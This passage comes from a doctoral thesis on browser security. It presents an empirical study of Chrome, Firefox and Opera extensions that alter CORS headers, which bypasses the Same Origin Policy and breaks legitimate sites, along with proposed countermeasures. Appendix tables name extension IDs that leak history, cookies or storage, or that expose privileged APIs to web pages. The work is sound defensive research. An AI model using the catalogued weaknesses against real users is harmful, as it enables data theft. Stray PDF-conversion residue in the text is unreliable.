popular category of extensions with the ability to tamper with HTTP headers. In the

Social category are different helper extensions for social networks and applications such as

Facebook, Twitter, Whatsapp. This can be explained by the fact that these extensions often

require such capability to tamper with (remove) headers like X-Frame-Options header, in

PUT(0,-845.90042)

4. EMPIRICAL STUDY ON CORS HEADERS MANIPULATIONS 181

order to frame the social network sites in the extension UI pages, allowing users to log into

their social networks from these extensions.

% Extensions

4.74.7

4.174.17

3.453.45

16.316.3

11.1711.17

10.341 0.34

34.834.8

20.522 0.52

19.781 9.78

27.927.9

62.8862 .88

66.0766.07

16.316.3

0-1,000 1,001-10,000 10, 001-100,000 100,001-1,000,000 >1,000,000

# Users

Chrome

Firefox

Opera

0 10 20 30 40 50 60 70 80 90

Figure 9.5 – Distribution of users of extensions with the capability to tamper with CORS

headers

Distribution of users Figure 9.5 shows the distribution of the users of extensions with

the ability to manipulate HTTP headers. On Chrome and Firefox, the majority of the

extensions have less than a thousand users, while on Opera the distribution of users is

more even. It is worth mentioning that a few extensions have millions of users. It the

case for 1.26%, 0.36% and 4.7% of Chrome, Firefox and Opera extensions respectively.

Compared to Chrome and Opera, the few Firefox extensions with millions of users can

be explained by the fact that the WebExtensions API [100] is relatively new on Firefox

where the XPCOM [156] API was long used for extensions development. The most popular

extensions include adblockers, tracker blockers such as uBlock Origin, Ghostery, Adblock.

Extensions that effectively manipulate CORS headers

The static analyzer flagged 136 extensions for manual analysis (See Table 9.1): 101 on

Chrome, 30 on Firefox and 5 on Opera. After manual vetting, we confirm that 63 of them

(51 on Chrome, 11 on Firefox and 1 on Opera) were effectively modifying CORS headers.

This represents almost half of the total extensions flagged for manual analysis. All exten-

sions reported here have been heavily tested, and were effectively tampering with CORS

headers. On Chrome, we found 4 extensions written in hexadecimal, for which we could

not draw any conclusion regarding CORS headers manipulations. The other unconfirmed

extension was the ZenMate VPN extension, present on Chrome, Firefox, and Opera. It had

a response listener that adds many CORS response headers, but by interacting with it, we

could not trigger this listener. The extension had quite a large code base, which further

made it hard to review.

Origins and targets of the CORS requests Table 9.4 shows the webpages and web

servers whose communications are intercepted and modified in order to authorize CORS

requests. The majority of extensions (52) allow any webpage to make unauthorized cross-

origin requests to any web application server (29 extensions) or to one or more servers

PUT(0,-845.90042)

182 CHAPTER 9. EXTENSIONS AND CORS

To any server To one or more servers

From any webpage 29 23

From one or more webpages 4 7

Table 9.4 – Sources (origins of webpages) and targets (web applications servers) of CORS

requests allowed by extensions. The table reads from row to column

Chrome Firefox Opera Total

User Action (click) 10 1 1 12

User defined settings 3 2 0 5

Total 13 3 1 17

Table 9.5 – User action to enable extensions

(23). The remaining 11 extensions allow one or more webpages to connect to any server (4

extensions) or to one ore more web application servers (7 extensions). As one can see, the

majority of extensions allow CORS requests for any webpage, which is rather worrisome.

User action required to activate extension We further analyzed the extensions to

see whether they required user action to be activated before they started manipulating

HTTP requests. Table 9.5 presents the results. Only 17 extensions require a user action

to be activated. All other extensions, once installed, start tampering with CORS headers.

In most of the cases (12 extensions), the user action is a click to activate the extension.

Nonetheless, 5 extensions give the user more control over the extension settings by allowing

him to define the webpages and web servers whose HTTP communications will be manip-

ulated. We think that this is the right way to go regarding CORS headers manipulation.

As these headers are sensitive, it is preferable not to enable the functionality by default

in extensions, but rather give control to the user to decide when such feature must be

enabled. We discuss, in Sections 5and 6, different guidelines on how to safely manipulate

CORS headers to testing purposes.

Users of extensions Figure 9.6 shows the distribution of users concerned with these

threats. Most of the extensions have less than a thousand users. Some are relatively

0-100 101-1000 1001-10000 10001-100 000 100001+

0 10 20 30 40 50 60 70 80 90 100

Figure 9.6 – Distribution of users of extensions manipulating CORS headers

popular, with thousands of users, with 3 extensions having more than 100k users. The

most popular extension is the Allow-Control-Allow-Origin: * Chrome extension [5],

which totalizes 455,875 users. Interestingly, this extension does not correctly tamper with

CORS headers. It breaks legitimate CORS requests with credentials. For instance, after

installing the extension, we could no longer play Youtube videos. This is also the case for

PUT(0,-845.90042)

4. EMPIRICAL STUDY ON CORS HEADERS MANIPULATIONS 183

the only Opera extension, CORS Toggle [35] we found tampering with CORS headers. See

Section 4.5 for more details.

Categories of Extensions Figure 9.7 presents the categories of extensions we found

effectively tampering with CORS headers. Interestingly, the Developer Tools category is

# Extensions

2020

1818

5555

22221111

Developer Tools

Productivity

Accessibility

Fun

Social & Communication

Photos Music & Videos

Search Tools

Other

Shopping

Figure 9.7 – Categories of extensions manipulating CORS headers

the most popular, followed by Productivity and Accessibility categories. However, it

is less than 1/3 of extensions which are in this Developer Tools category, suggesting that

CORS headers modifications could be more diffused, and not only limited to extensions

provided for advanced users (developers) for testing purposes for instance.

Implications of HTTP headers manipulations Manipulating CORS headers has

2 main implications. The first implication is that if the CORS mechanism is well un-

derstood and the manipulations are well done, as in the case of the CORSER extension

presented in Section 3, then the extension authorizes unauthorized cross-origin requests,

thereby allowing web applications to bypass the Same Origin Policy by accessing data

of cross-origin web applications servers, even though such servers do not authorize cross-

origin accesses. The second implication is that, without a good understanding of the

CORS mechanism, an extension can break legitimate requests made from web applica-

tions that the user is currently interacting with. As an example, if a webpage makes a

cross-origin request to a server that authorizes the request (the server responds with an

Access-Control-Allow-Origin header setting its value to the origin of the page which

makes the request, and the Access-Control-Allow-Credentials response header whose

value is set to true), and an extension modifies the Access-Control-Allow-Origin header

to *, then it breaks the legitimate request (See Section 2for more details about the CORS

mechanism).

4.4 Breaking the Same Origin Policy

Table 9.6 shows how the extensions we have analyzed tamper with CORS HTTP headers,

and which types of CORS requests (simple, preflighted) they authorize.

PUT(0,-845.90042)

184 CHAPTER 9. EXTENSIONS AND CORS

Chrome Firefox Opera Total

Simple 51 11 1 63

Preflighted 29 6 1 36

With credentials 7 3 0 10

Total 51 11 1 63

Table 9.6 – Extensions breaking the Same Origin Policy - Types of authorized CORS

requests

Simple requests All extensions modify requests as to authorize at least simple CORS re-

quests without credentials. This is achieved by adding the Access-Control-Allow-Origin

header in responses headers, setting its value to *, or to the origin of the webpage which

makes the cross-origin request. It is worth mentioning the case of the Disable CORS

Chrome extension [46]. In fact, it changes the value of Access-Control-Allow-Origin

response headers to the origin of the webpage from which a cross-origin request is made.

Hence, it requires that the server first responds with an Access-Control-Allow-Origin

header in order to change its value to the origin of the page. It still bypasses SOP, because

a server can respond with a value of Access-Control-Allow-Origin set to an origin dif-

ferent from that of the webpage making the request. Without this extension, such CORS

request would have failed. By changing the value of the header to the origin of the request,

the request becomes authorized.

Preflighted requests Half of the extensions (35) also modify CORS headers in order

to allow preflighted requests. In most of the cases, in order to allow preflighted requests,

extensions would add the Access-Control-Allow-Methods header in responses, by setting

its value to the most commonly used HTTP methods (GET,POST,PUT,DELETE,HEAD).

For HTTP headers, most extensions also add the Access-Control-Allow-Headers header

with a predefined set of known HTTP headers. A very few of them reflect the value of the

Access-Control-Request-Header in the response, in order to allow requests with custom

headers.

Requests with credentials From a security perspective, simple or preflighted CORS

requests without credentials are less sensitive, as they are not made with user credentials

(See Fig. 9.3). Even though they represent unauthorized accesses to web servers, and break

the Same Origin Policy (because browsers must not allow cross-origin requests unless the

web servers respond with the appropriate CORS headers), the responses to these CORS

requests could potentially be obtained by other means, for instance by using a proxy server,

to simulate simple and preflighted CORS requests.

The most concerning issues, from a user perspective, are extensions that allow CORS

requests with user credentials. We found 10 such extensions (7 on Chrome, and 3 on

Firefox) which allow CORS requests using user credentials. Fig. 9.4 demonstrates a CORS

request with credentials, where any webpage can access the user google account information

(in this example, it is the email of the user).

4.5 Breaking legitimate CORS requests

The second concern we found among extensions that modify CORS headers, is the break-

age of legitimate web applications. Table 9.7 present extensions which can break some

PUT(0,-845.90042)

4. EMPIRICAL STUDY ON CORS HEADERS MANIPULATIONS 185

legitimate CORS requests, because of harsh modifications done on HTTP requests.

Chrome Firefox Opera Total

Simple 3 1 0 4

Preflighted 30 5 0 35

with credentials 36 8 1 45

Total 46 9 1 56

Table 9.7 – Breaking web applications, because of a harsh modification of CORS headers

by extensions.

Figure 9.8 – Breaking legitimate CORS requests by adding multiple values to the

Access-Control-Allow-Origin header

We found 2 extensions on Chrome and 1 on Firefox that add *as a second value to

the Access-Control-Allow-Origin response header when a server responds with the

Access-Control-Allow-Origin header. This causes the requests to fail, because the

Access-Control-Allow-Origin header cannot have 2 values: either it is *, or an origin.

Fig. 9.8 shows a message displayed in browser console in the case of such an error.

Another case is that of the CloudExtend Gmail for NetSuite Chrome extension [30]. It

fixes the value of the Access-Control-Allow-Origin to a specific origin, regardless of the

origin of the webpage making the request. Therefore, web pages whose origins are different

from the fixed one, can no longer legitimately connect to the web servers whose responses

are modified by the extension.

For preflighted requests, the breakages are due to the fact that many extensions fix the list

of methods they set as values to the Access-Control-Allow-Methods header, or the list of

headers set to the Access-Control-Allow-Headers header. This prevents web applications

from making CORS requests with methods or headers other than the predefined ones. Even

though web servers accept the custom headers and methods, they are overwritten in the

responses by the extension, causing a mismatch, then a failure of the preflighted request.

Figure 9.9 – Breaking legitimate CORS requests with credentials by changing

Access-Control-Allow-Origin to *.

Finally, the vast majority of legitimate CORS breakage are due to a misunderstanding

of CORS requests with credentials. Most of the requests fail because extensions change

the value of the Access-Control-Allow-Origin header to *, even in presence of CORS

PUT(0,-845.90042)

186 CHAPTER 9. EXTENSIONS AND CORS

requests with credentials. This prevents legitimate extensions from making CORS re-

quests with credentials. In fact, to allow CORS requests with credentials, the value of the

Access-Control-Allow-Origin header must be the origin of the webpage which issued the

request, and not *. Fig. 9.9 shows an error displayed in Google Chrome console when CORS

requests with credentials fail because of the value of the Access-Control-Allow-Origin

being set to *.

At https://swexts.000webhostapp.com/cors/youtube.webm, one can view a video demon-

strating how the Access-Control-Allow-Origin:* extension on Chrome [5], having more

than 400k users, break the Youtube application. Installing this extension makes it impos-

sible to play Youtube videos. This is because it breaks CORS requests with credentials.

Fig. 9.9 shows an error message displayed in the console regarding this error. The CORS

Toggle [35] extension on Opera, also poses the same issue.

5 Discussions

The main question we raise here is, must all HTTP headers be equally treated ? For

instance, changing the value of the Server header, which indicates the name of the server

hosting a resource, does not have the same implications from a security perspective, as

tampering with CORS headers, as we have shown throughout this work. Security criti-

cal headers manipulations by browser extensions is a threat that users must be aware of

when installing an extension that has this capability. It is therefore important to consider

the manipulations of security critical headers as a threat, and review extensions accord-

ingly, so as to identify them and warn users at install time. However, we acknowledge

that this may be a daunting task from a browser vendors perspective, because extensions

may be obfuscated in order to evade such review process. Therefore, we think that the

ability to tamper with security critical headers must not be automatically granted to exten-

sions when they have the permission to tamper with HTTP headers with the webRequest

and webRequestBlocking permissions. By security critical headers, we include CORS

headers (See Table 2.2). We also include Content-Security-Policy [275] which is used

to fight against content injection attacks and in particular the notorious XSS [41,135],

X-Frame-Options which helps to mitigate clickjacking attacks [244], and any header that

could potentially introduce serious security threats in web applications. We propose 2 pos-

sible directions, from a browser vendor perspective: (i) either disallow the manipulation

of CORS and other security critical headers, as also suggested by Kaparavelos et al. [213],

otherwise (ii) browser vendors should require that extensions explicitly request a dedicated

permission for the header that they need to tamper with.

5.1 Disallowing security headers manipulations

It is not clear why a benign extension may require to modify headers such as CORS. In fact,

extensions are not subject to the Same Origin Policy. That is, cross-origin requests from

an extension are allowed, regardless of whether the targeted server responds with CORS

headers or not. However, extensions that make cross-origin requests may be considered

suspicious by browser vendors during the extension review process. Hence, an extension

can first disable the Same Origin Policy via CORS headers manipulation, then inject a

script in a webpage from where it can unsuspiciously make cross-origin requests without

being considered a malicious extension during the extensions review process. This is exactly

what we have achieved with the CORSER extension.

Because of the security threats posed by extensions tampering with CORS headers, we ar-

PUT(0,-845.90042)

5. DISCUSSIONS 187

gue that manipulating security headers must be forbidden by default in browser extensions.

This has been recommended by Kaparavelos et al. [213] regarding the Content-Security-Policy

and X-Frame-Options headers, even though no browser vendor has so far implemented this.

Moreover, browser vendors already do not allow extensions to tamper with a few HTTP re-

quest headers, including Authorization, Host, Cache-Control, If-Modified-Since,

etc. [28,60]. To prevent extensions from modifying the restricted headers, the headers are

simply not included in the list of headers passed to the different events triggered by HTTP

communications, such as the onBeforeSendHeaders event listener, where HTTP requests

headers are usually modified. Similarly, to prevent extensions from tampering with security

headers (CORS headers, Content-Security-Policy,X-Frame-Options), browser vendors

may choose not to expose them to the appropriate request and response event handlers.

5.2 Requesting permissions to manipulate security headers

Our second proposal towards mitigating the threats introduced by extensions tampering

with HTTP security headers, is to require that browser extensions explicitly request per-

missions to be able to tamper with a sensitive header. Hence, in addition to the webRequest

and webRequestBlocking permissions required to intercept HTTP requests, the ability to

manipulate sensitive headers would be granted to an extension only if it has explicitly

requested that permission, by including the name of the sensitive header in the list of

permissions of the extension manifest.json file as shown in Listing 9.3 below.

1"permissions": [

2" < al l _u rl s >",

3" w eb R eq u es t " ,

4" w eb R eq u es t Bl o ck in g " ,

5"access-control-allow-origin"

Listing 9.3 – Permissions to manipulate the Access-Control-Allow-Origin CORS

response header

The advantage of this proposal is that it gives browser vendors the possibility to warn users

of the security implications of installing an extension that can tamper with HTTP security

headers. In fact, we argue that web browser vendors must warn users about extensions

tampering with security headers such as CORS. Unfortunately, when installing an extension

which could potentially break the Same Origin Policy, no browser vendor would warn the

user about such threats. This is mainly due to the fact that headers modifications is not

taken into consideration as a security threat when extensions are reviewed.

From an implementation perspective, and for backwards compatibility, if an extension does

not have the permission to modify a header, the modifications that it does will be simply

ignored. If one argues that this breaks the functionality of the extension, in reality, when

multiple extensions tamper with HTTP headers, each extension can alter and potentially

revert the modifications done by other extensions that manipulated the headers before

it. Moreover, there is no guarantee on the order in which extensions will be passed the

HTTP headers [28]. So the fact that the browser ignores the modifications done by an

extension could be potentially achieved if the user has installed an extension which reverts

the modifications done by other extensions.

PUT(0,-845.90042)

188 CHAPTER 9. EXTENSIONS AND CORS

6 Countermeasures

In this section, we discuss different proposals for web applications and users to fight against

the threats introduced with CORS headers manipulation by browser extensions.

6.1 Web applications servers

The main problem with the ability for extensions to tamper with CORS headers is the

fact that extensions break the backwards compatibility of the CORS mechanism. In fact,

in a normal setting, in order to authorize CORS requests, both browsers and web servers

must implement the mechanism. However, if either the browser or the server does not

implement CORS, then the SOP applies, in which case, cross-origin requests are forbidden

by default. Now with the ability of extensions to tamper with CORS headers, the response

returned by the server can be delivered to webpages if an extension adds the appropriate

CORS headers. To mitigate this, a server must then implement CORS by default. Then, it

must try to ensure that the request is effectively originating from a trusted webpage before

responding with data. This can be achieved for instance, by an exchange of tokens prior to

authorizing cross-origin requests, as in the case of mitigation of CSRF (Cross-Site Request

Forgery) attacks [135]. Web servers can also check the values of the Origin and Referer

to ensure that they are set in the request, they match each other and are from a trusted

origin. We found that the majority of extensions that tamper with CORS do not modify

these headers, meaning that a server implementing CORS can detect the effective origin

of the request. Moreover, a few extensions change the value of Origin header to cause

a mismatch with the Referer header. As a general recommendation, when a cross-origin

access is not authorized, a web server should not respond with data.

6.2 Extensions Users

From a user perspective, the main protection against the impact of extensions tampering

with CORS, is to log out of web applications, and clear all authentication credentials.

Ultimately, one can use browser environments where no extension is installed (browser

private or incognito mode) or even a browser with no extension, in order to interact with

sensitive web applications.

6.3 Extensions Developers

For extensions developers, there is a need for a better understanding of the CORS workflow,

as we have shown in Section 2. Particular attention is to be paid to preflighted requests,

and requests with credentials, so as not to break legitimate web applications. Extensions

such as CORSER, must be used by advanced users only to perform controlled experiments

such as testing web applications for instance. Ultimately, full control must be given to

the user to define when to activate the extension, on which pages the requests that can

be made. One can take as a starting point our CORSER extension (https://github.com/

mesolido/corser/) and further customize it for the needs of web applications testing.

7 Conclusion

In this chapter, we first showed how trivially, extensions can manipulate CORS headers,

and their implications on browser security, the security and functionality of web applica-

tions, and the security and privacy of user data. We developed and published the CORSER

PUT(0,-845.90042)

7. CONCLUSION 189

extension on Chrome, Firefox and Opera. In doing so, we demonstrated that despite the

fact that CORS headers manipulation disabled the Same Origin Policy security mechanism

in browsers, this practice was not identified as a security threat by browser vendors. We

analyzed extensions in the wild, and found a few of them effectively tampering with CORS

headers so as to authorize unauthorized cross-origin requests. Furthermore, we found that

CORS is often misunderstood as extensions developers harshly manipulate CORS head-

ers, thereby breaking legitimate web applications. To mitigate the aforementioned threats,

we suggest that the ability of extensions to manipulate CORS headers be forbidden by

default, otherwise extensions should require explicit permissions for the headers they can

manipulate. Finally, we discussed countermeasures to fight against these threats from a

user and web application perspective.

PUT(0,-845.90042)

PUT(0,-845.90042)PUT(0,-845.90042)

PUT(0,-845.90042)

Chapter 10

Conclusion

The time is now long gone, when web applications were made of content originating only

from the server of the application. Nowadays, web developers make extensive use of third

party content in order to quickly build full fledged applications. Web applications provides

different services to users (mailing, social networking, banking, working, etc.) and browser

extensions are third party programs that serve to customize user’s browser and improve

her browsing experience. Hence, web applications retain and manage user data. Browsers

implement the Same Origin Policy (SOP) to ensure that two or more web applications

cannot directly access each other data, unless the web applications explicitly authorize the

accesses via mechanism such as CORS (Cross-Origin Resource Sharing). Tightly integrated

to browsers, extensions however are exempted from compliance with the Same Origin Policy

and therefore have access to user data retained by web applications. They can also access

many more user information and features in the browser.

In this thesis, we studied the security and privacy threats in the browser posed by web

applications the user interact with, and the browser extensions that she installs.

There are many attacks targeting the web of which XSS is the most notorious. Third party

tracking is the ability of an attacker to benefit from its presence in many web applications

in order to track the user has she browses and build her browsing profile. Two categories

of tracking: stateful of which cookie-based tracking is the most known, and device finger-

printing. In the first case, a third party stores information in the user browser and uses

that to recognize her. In the second case however, the tracker rather collects information

about the user browser and use that to recognize her through different browsing sessions.

Malicious or poorly programmed extensions can be exploited by attackers in web applica-

tions, in order to benefit from extensions privileged capabilities and access sensitive user

information.

Content Security Policy (CSP) is a W3C mechanism proposed for mitigating the impact of

content injection attacks in general and in particular XSS. We performed three main stud-

ies on CSP. In a first work, we analyzed the interplay of CSP with the SOP. In fact, CSP is

a page-specific that applies only to the webpage on which it is deployed. The SOP however

allows same-origin webpages to access each other data. We showed that in this case, CSP

can be violated by scripts in same-origin webpages without a CSP or with a different CSP.

We performed an empirical study and found that indeed many web applications are subject

to CSPs violations due to their same-origin webpages. We then discuss countermeasures.

In another work, we scrutinized the three CSP versions, and how browser implement them.

We found that a CSP that is deployed to protect a webpage, could end up being differ-

ently interpreted depending on the browser, the version of CSP it implements, and how

compliant the implementation is with respect to the specification. To help developers de-

191

PUT(0,-845.90042)

192 CHAPTER 10. CONCLUSION

ploy effective policies that encompass all these differences in CSP versions and browsers

implementations, we introduce the deployment of dependency-free policies (DF-CSP). This

ensures that irrespective of the browser where the application runs, the policy enforced

provide the same protection against attacks. Finally, previous works have identified many

limitations of CSP. We reviewed the different solutions proposed in the literature and in

the specification, and demonstrate that they do not successfully mitigate the identified

shortcomings of CSP. Therefore, we propose to extend the CSP specification with four

new extensions: a blacklisting mode in CSP, a URL arguments checker mechanism, the

introduction of a new directive disallow-redirects for mitigating CSP bypasses based

on HTTP redirections, and an efficient reporting mechanism for collecting feedback about

the runtime enforcement of CSP. We show that these extensions require little modifications

in the current implementation of CSP. To demonstrate this, we implemented the proposed

extensions.

Turning to third party tracking, we proposed and implemented a tracking preserving ar-

chitecture, that can be deployed by web developers willing to include third party content

in their applications while preventing cookie-based tracking. The architecture consists in

a Rewrite Server, that automatically rewrites webpages in order to redirect third party

requests to a trusted Middle Party Server, which removes tracking information exchanged

between browsers and third party servers.

Regarding browser extensions, we first showed that the extensions that users install and

the websites they are logged into, can serve to uniquely identify and track them. To do

so, we set up a website where we detect and collect the set of extensions installed in the

user browser and the web applications where they are logged into. Our results show that

around 55% of users are uniquely identifiable when they have at least 1 extension installed,

and around 20% are uniquely identifiable when logged into at least 1 web application. In-

terestingly, we could uniquely identify around 90% of the users having 1 ore more extension

installed and being logged into 1 ore more websites. Then, we studied the interactions be-

tween browser extensions and web applications and demonstrate that malicious or poorly

programmed extensions can be exploited by web applications to benefit from extensions

privileged capabilities. We found around 200 extensions that can be exploited by web

applications to bypass the SOP and read other web applications data, read user cookies

and mount session hijacking attacks, user browsing history, bookmarks, list of installed

extensions and use them for tracking purposes or to serve advertisements, download ma-

licious software to damage or exfiltrate user data, and store information in the extension

storage and use this for tracking purposes. Finally, we demonstrate that extensions can

disable the Same Origin Policy by intercepting and adding or modifying CORS headers in

order to authorize cross-origin requests. We demonstrate that by publishing the CORSER

extension on Chrome, Firefox and Opera. Even though this extension clearly disables the

SOP in browsers, it was considered benign by browser vendors. We furthermore performed

an empirical study and found that a large number of extensions have the ability to disable

the SOP in browsers. More worryingly, we found that the CORS mechanism is widely

misunderstood among extensions developers, because many of them tamper with CORS

headers in a way that break legitimate web applications. To mitigate these threats, we

propose more fine-grained permission systems and review process for browser extensions

that can let browser vendors warn users about the threats posed that extensions they in-

stall. Users can fight against these threats by logging out of web applications, or even

avoid using sensitive web applications in browsers where they have extensions installed.

PUT(0,-845.90042)

193

Future works and general thoughts

The formalization of dependencies (Chapter 4) can be extended to account for interactions

with same-origin pages (Chapter 3). Also, the semantics of a CSP deployed on a page

embedded as an iframe, depends on whether the page is sandboxed by its parent or not.

Browser extensions present many more security and privacy threats that can be investigated

further. Some of the tools we built to conduct different works presented in this thesis can

be further engineered in order to make them more usable by the public.

PUT(0,-845.90042)

PUT(0,-845.90042)PUT(0,-845.90042)

PUT(0,-845.90042)

Appendix A

Appendix

195

PUT(0,-845.90042)

196 APPENDIX A. APPENDIX

Table A.1 – Extensions with the same code base which gives *.fliptab.io access to brows-

ing history (get/delete), bookmarks (get), extensions (get/enable/disable/uninstall) and

storage

bddmmehmgpjhhmbbmngdjhlednmkbken

cajmbfbhhfelhgolhldhhodkclpakcfe

cepmfckfppjpbkjgnpokojedlngflnca

clkodoejadlbjaopcjoijihebbgipjff

dekpebffaadijeaogggfhjemdbjgbcao

dkpndikhfepllbpaafgcelembimabofo

eeiedbnahjonkmimigblgchlefcklhok

efdddbobcofamdjmekphjlhgmcnhobbp

ehmhopjniedignnkdeijmpmodhcppgif

eilbnnflfpkhhfmhmlhflhecceajpkcj

fieoemdbopiialnojhifcndkenhjkbmm

fkpmpnljocdllgmplhnmjhjmmilbnofj

gfgchcclfmppnfoakdlhgdhnolbpiedf

glfbbjdfmmlanpikdedpjoeimlijjcjj

hmbedbiicehadpbhbipafffieolpjolh

hocncjdhccalpmblkpagbmjebkfkibbm

iamlligjelallbdddajmbojjjhadkmcf

jcffnpjkbahanenhcnhhdfopkjlpflfm

jokpapkhjeahjbkemfjfhjgcogmbcpoi

kkejopfphkmldfpdmcljfoinfcljijjf

klfeojnepdoehgddffbcjiamcjjahmgj

lbfidebeingoondbmpeapjoeeoloanak

lgphbplfjpemcghfcoajehcmikflcbbd

lmbcpiodajlbgmjbiajgcjdalgbofcbn

loggojfoonblkkhkjpijapeheoogagki

lpkfidfkgflpbakdnhpojiejlpdanknh

mgmodhbknbfmpjmilankiffnjbelcipo

mibaeahdcconphmdndbeipegldkkbcjh

odpiaedkmdpcheddbkilnkelhhocoenn

pfdaccgdljiifplhfnjcacapfedngonb

afddmpnodjaifgjibafjcbfaplnoipei

PUT(0,-845.90042)

197

Table A.2 – Extensions with the same code base for triggering downloads from vk.com,

*.vimeo.com, *.coub.com, *.kinopoisk.ru

nfhipbkhabgmkhahoaagkcgppcjikjgl

idenapkfefkbknhbmfgeaclpcpbhcnbe

fnnlocjimhjpmgfjhjamdkjhemfhkhjo

lmlnplkfbiihcpkghkkmfefjdaccmbcc

kbiocjbkoohjjkkeaafiemjeidgalllh

dccmnjciogmmahaogjgkocongokmieog

ekfkljjojhnnhfedepfnbhhfjklagngk

hhfgpbjpilbbaomjmdpnfchbpipehiif

pgajmafmbajahclonccaoaoleghhnpam

ipeeopcjpgcbgnfogjlickeilmkbonen

jfpmehlefcchhhmlmennihbbihaolabk

kcollknpphnodcjdkcmgpjmlbaenabao

backekeabechifnekobfachchocbmjag

mfpbgndgoogfplejodpbhnfmaibnalkf

ojhheobonaamlhlcdngacakdcigpeokl

mienmjdbnnpaigifneeiifdbjkdgelha

amaobfendgcolppeioeageanmillkmkc

Table A.3 – Extensions with the same code base which leaks topsites, history and/or

bookmarks to *.atavi.com, *.atavi.test

iglbnbabjdfaobglhonmnlkdbommiebd

knflcnelciofoghldagpknelepafjeif

lamnafpjcnoclihgpefhdbefcmjikhaj

jffjjdoccjiflmckicphblggbppfgklk

ofmacdiceehcibkfednmgpkhgfhpacgi

jpchabeoojaflbaajmjhfcfiknckabpo

Table A.4 – Extensions with the same code base, provided by Fabasoft, which give access

to the current tab cookies

ajlbdflhaaflcepndpkdgejimggjcpnm

ngbcdblbfdpjgpmgfagkfofcjbnggfgn

pdhjoolhbkmlgjfedckdhiknnoabbnkk

hiejidhjgjpelfgldfhmnaoahnephhfg

icjlkccflchmagmkfidekficomdnlcig

PUT(0,-845.90042)

198 APPENDIX A. APPENDIX

Table A.5 – Extensions which give access to their storage to any application

eljhpoopiapggnlfcilpbihgbgbpnkgd

akhamklknibionleflabebgeikdookmp

hebabhddakflgmlhgefakkfkciijliie

ilgdjidfijkaengnhpeoneiagigajhco

ohdihpdgfenligmhnmldmiabdhflokkh

abenhehmjmoifipfpjeaejpbeeihnokp

ackpndpapmikcoklmcbigfgkiemohddk

ceogcehidijhepckebfifkpfogkajdkg

cgijoonmpaboophnagdckdcekmpfokel

dhcfokhhmhenbfmeflifppiedabfggkj

dhcmolikocplmafolinkncghmahimooh

eamjolanjdmgochipodfokkfjaeifhon

efhbachoakbcmbcmfffdgphbpcbldjac

fecipnolpdcmoidbjbnakpjgfikbnaik

gnnagpehbmfalanfjadamobejlldgedo

ijdfpccaiklfhpnamolipbjjijilmhli

khjhfgcimhcnaimdbgjbnbhcojkoceoc

niceocbendibobemckcagggppphheomc

okcfiidnmioajibmhhjpiomgejajiafa

pjjceionkajpednnegoanjjdlhbgkkpc

pjojmkmdealampgchopkfbejihpimjia

PUT(0,-845.90042)

199

Table A.6 – Extensions which give access to their storage to specific applications

lpkhcobfjeidpkllbeagkkmmjgbmpfch mail.google.com

eggdmhdpffgikgakkfojgiledkekfdce mail.google.com

jmllflbhbembffempimjdbgnaodpoihh mail.google.com

jmlnhlclbpfcbkaoaegfigepaffoankc *.google.com,

gaoiiiehelhpkmpkolndijhiogfholcc netflix.com

ghldlmcbffbcnoofadgcapodmpiimflj netflix.com

jpgadigdffhcjldfkanacncocacekkie netflix.com/watch/

peiajekggpiihnhphljoikpjeaahkdcn beam.pro

bnfboihohdckgijdkplinpflifbbfmhm plug.dj

aclhfmpoahihmhhacaekgcbjaeojnifa wordix.io,

hcdfoeppbchkbbpplllggbjkkfokifej *.vk.com/feed/

hddnlanhlmifafibmlabomkkkobcmchj thankscoin.org

lhjajgnfmiliphkioedlmbfcdkhdhnkc *.service-now.com

bmdlalnebjigindhobniianfmhakfelf robertsspaceindustries.com,

dadggmdmhmfkpglkfpkjdmlendbkehoh openvideo.droppages.com

pbpfgdgddpnbjcbpofmdanfbbigocklj tweetdeck-enhancer

ilpkhojfiejdbkgcjbmllngjebdoehim *.phylotree.org

cfnjeahambijfdljfacldifapdcklhnj isogg.org

cjkbjhfhpbmnphgbppkbcidpmmbhaifa *.player.me

ddiaadobgihkgefcaajmkjgmnjakiamn auth.digitalkeyway.com

dienbdhbgkpddlgaceopelifcjpmkeha *.gestionderesidencias.es

dnpdkejhfeeipmklhlkdjaoakbkjkkjn datalane.io

gmjdaaahidcimfaipifeoekglllgdllb chat.stackexchange.com

kfodnoaejimmmphonklghkimhnhhgbce overlayBI.com

PUT(0,-845.90042)

200 APPENDIX A. APPENDIX

Table A.7 – Chrome, Firefox and Opera extensions that can be exploited by web applications access privileged APIs and sensitive user

information

Extension unique identifier or name Web applications

to send messages

from

Target web

applications to

access

Permissions (accessible privileged API)

Chrome Browser

fimckmjeammfdcpldmcigeojkkmeeian * * eval,host,storage,downloads

fidaihkgnbcbkkdaoebdionfjenegede * * eval,host,storage

hnkmipajjgbclkombnmigfnpekddlhlh * * eval,host,storage

fajjnmbcianlnhmngmabhgkmgdindlha * * eval,host,storage

efajnkcfjjkcodbhkhaigkffdleomnag * * eval,host

hoobpdoclliidciecjifpikpnopjpmkh * * eval,host

kjfjdocojijlledbaanbhpcnkoimghal * * eval,host

pfofjhnkanlacmgfgjohncmgemffkldl app.ringostat.com * eval,host,cookies,storage

gooecknlakggnppmhfpopneedjconjjp lionlock.com, * eval,host,storage

bdiogkcdmlehdjfandmfaibbkkaicppk *.delfa.com.br * eval,host,storage

pgbjjemkcflenaakhiehfdmcdnlnlpbl www.seejay.cloud * eval,host,storage

hdanmfijddamndfaabibmcafmnhhmebi *.hirogete.com, * eval,host

hpmeebiiihmjelpjmmemlihhcacflflc *.valleyge.com * eval,host

oejnkhmeilmiplpmenkegjaibnjbappo search.lilo.org, * eval,host

jkoegdibpkleifbkojmplebjhfllkckn search.uselilo.org, * eval,host

aopfgjfeiimeioiajeknfidlljpoebgc * * host,cookies

hlagecmhpppmpfdifmigdglnhcpnohib * * host

kpgdinlfgnkbfkmffilkgmeahphehegk * * host

bjjpnhdlhpfdebcbhdlmecafnokpjpce * * host

PUT(0,-845.90042)

201

Table A.7 – Chrome, Firefox and Opera extensions that can be exploited by web applications access privileged APIs and sensitive user

information

Extension unique identifier or name Web applications

to send messages

from

Target web

applications to

access

Permissions (accessible privileged API)

Chrome Browser

bmiedopcajpcehbbfglefijfmmndcaoa * * host

jegnjmcegcpodciadcoeneecmkiccfgi * * host

jnhibbjmekoijdjaopflcjbjieamifhh * * host

jpkfmllgncphdgojhkbcjidgeabaible * * host

ilcpdgfepihaomggobhmfiimflngbcoh starthq.com, * host,history

jpcebpeheognnbogfkpllmmdnimjffdb mail.google.com, * host,management

cnkgdfnjmgamkcpjdljdncfjcegpgcdg mail.google.com, * host,management

